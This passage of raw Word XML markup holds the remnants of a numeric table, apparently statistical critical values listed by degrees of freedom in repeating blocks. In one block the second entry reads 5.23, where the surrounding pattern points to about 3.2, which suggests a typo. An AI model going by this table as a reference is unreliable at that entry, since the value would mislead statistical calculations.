      </w:r>
    </w:p>
    <w:p w14:paraId="06F92769" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F69A7C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1), 4.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335780A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2), 3.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF0237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3), 3.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D9C6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4), 2.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB5947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5), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CDDB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6), 2.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A36CF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8), 2.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6597CFE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12), 2.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1026D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16), 2.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AECFF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24), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676DD42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50), 1.88},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6FF12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51), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083F024" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A04FC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1), 4.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112034D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2), 3.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B980FD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3), 3.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A5A9D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4), 2.78},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7571700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5), 2.62},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE47F7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6), 2.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB8D1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8), 2.36},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78608B6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12), 2.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1361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16), 2.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715602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24), 1.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15C64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50), 1.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4064680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51), 1.73},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7FDBB" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CDCE5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1), 4.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70DC0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2), 3.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5FA3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3), 2.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E067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4), 2.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B23A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5), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F739376"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25, 6), 2.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FECEE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8), 2.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9805B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12), 2.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620401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16), 2.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E47301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24), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D6AC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50), 1.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C62E9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51), 1.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5DF3F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D825AE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1), 4.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE693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2), 3.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4B2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3), 2.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533CF3A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4), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C7E6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5), 2.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AE1E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6), 2.47},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E685D1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8), 2.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C8FC5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12), 2.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85C1D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16), 2.05},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B2BD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24), 1.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D371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50), 1.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B817D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51), 1.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7892AA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289F56A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1), 4.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB344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2), 3.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A1872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3), 2.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB74B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4), 2.73},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584A0A4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5), 2.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B79A9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6), 2.46},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562AD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8), 2.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3401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12), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF3E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16), 2.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE780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24), 1.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4FFDE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50), 1.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCAB2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51), 1.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF23B9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489A7C9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1), 4.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ABC8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2), 3.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46803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3), 2.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B25A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4), 2.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246150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5), 2.56},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A24AA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6), 2.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E167B4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8), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8321E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12), 2.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B7E0E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16), 2.02},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CA74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24), 1.91},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB58E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50), 1.78},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BEF35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51), 1.65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1589D40E" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6398DE3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1), 4.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9135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2), 3.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC5E5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3), 2.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687BCFE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4), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E38F68"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29, 5), 2.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650175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6), 2.43},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FFDF2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8), 2.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A21A7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12), 2.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A1D4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16), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE26D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24), 1.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1343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50), 1.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145BC34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51), 1.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5FF462" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2F08C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1), 4.17},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7178F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2), 3.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3A631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3), 2.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F733A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4), 2.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06857B8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5), 2.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E0355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6), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C3CC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8), 2.27},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0863774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12), 2.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE3BD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16), 1.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE4086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24), 1.89},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70222D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50), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F036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51), 1.62},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2A318" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0257A24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1), 4.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9D12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2), 3.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA21C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3), 2.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134DF6C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4), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310202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5), 2.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532FEC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6), 2.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006576A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8), 2.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86CF3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12), 2.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C97C2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16), 1.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACCB5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24), 1.83},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6501CD6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50), 1.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1130EDF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51), 1.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26BE08" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7254F87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1), 4.08},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC087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2), 5.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D184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3), 2.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A49BA0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4), 2.61},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972952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5), 2.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0E79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6), 2.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085241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8), 2.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B4736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12), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BB126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16), 1.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABDBBC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24), 1.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDAA52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50), 1.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFDADE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51), 1.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805DC6C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E603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1), 4.06},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11336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2), 3.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED596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3), 2.81},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C52C3"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45, 4), 2.58},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4FC41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5), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522FB4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6), 2.31},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F9B8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8), 2.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD783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12), 1.97},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A5D8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16), 1.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331F12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24), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFE715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50), 1.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754DF0B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51), 1.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18707A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269FC3A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1), 4.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2099A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2), 3.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB3954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3), 2.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1772971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4), 2.56},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221A2B9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5), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6106ED1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6), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C3404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8), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8606B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12), 1.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BB636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16), 1.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2567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24), 1.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1BF5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50), 1.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA48EB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51), 1.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66044DC2" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2803A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1), 4.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702151B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2), 3.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4948EC3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3), 2.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D99E07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4), 2.52},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344950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5), 2.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591569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6), 2.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258BDC1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8), 2.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01883CA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12), 1.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B664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16), 1.81},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E062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24), 1.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F70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50), 1.56},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1839685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51), 1.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D65735A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68072D0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1), 3.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7657E7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2), 3.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565418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3), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3890852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4), 2.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B52101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5), 2.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363F84F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6), 2.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDDC0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8), 2.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3AE2C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12), 1.89},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A9F6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16), 1.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4561BB0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24), 1.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51511D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50), 1.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF2853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51), 1.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED6D18" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007EEA9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1), 3.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFA77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2), 3.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C83342"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80, 3), 2.72},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29635FA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4), 2.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645A593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5), 2.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791CBB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6), 2.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5EF76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8), 2.06},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C47060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12), 1.88},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE6CC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16), 1.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F86B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24), 1.65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C05A2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50), 1.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F2FB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51), 1.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E60CAB" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7480D4C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1), 3.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F121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2), 3.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79168AE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3), 2.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC55E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4), 2.47},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD854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5), 2.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930E37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6), 2.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23932D3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8), 2.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603965E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12), 1.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508069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16), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF2CD3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24), 1.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B78D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50), 1.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBA3FE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51), 1.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00336E6C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501FDA5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1), 3.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108CCF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2), 3.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB39C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3), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D372D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4), 2.46},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA42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5), 2.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10006E2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6), 2.19},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8DD6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8), 2.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6550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12), 1.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4965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16), 1.75},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C97C4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24), 1.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B25B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50), 1.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697BB2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51), 1.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980E045" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702894B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1), 3.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE7F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2), 3.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8B3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3), 2.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C2A5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4), 2.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151145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5), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B0203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6), 2.17},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D0CE2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8), 2.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A815E6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12), 1.83},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00102E2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16), 1.72},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C83F2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24), 1.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A931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50), 1.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A4A3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51), 1.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD2A32" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA8855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1), 3.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050F8DBC"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150, 2), 3.06},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD0A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3), 2.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F558DA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4), 2.43},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00283E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5), 2.27},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F921C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6), 2.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90B7B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8), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE4BE1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12), 1.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D9E0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16), 1.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488416F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24), 1.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E71997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50), 1.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719F3C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51), 1.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A9E8F0" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065A429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1), 3.89},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA4B9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2), 3.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2AF6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3), 2.65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5140E50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4), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0189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5), 2.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD004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6), 2.14},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6145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8), 1.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2C89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12), 1.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C6F58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16), 1.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC6AC6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24), 1.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1386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50), 1.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E5FE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51), 1.19},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1260E9A6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF02D8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1), 3.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0FF5B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2), 3.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E52BE4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3), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B991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4), 2.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300CF0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5), 2.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B78323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6), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A7C9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8), 1.97},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB3B6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12), 1.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E23746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16), 1.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4135691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24), 1.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C55E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50), 1.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2947E5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51), 1.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46486289" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F8F2E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1), 3.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268BF05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2), 3.02},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61904B0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3), 2.63},</w:t>
      </w:r>
    </w:p>
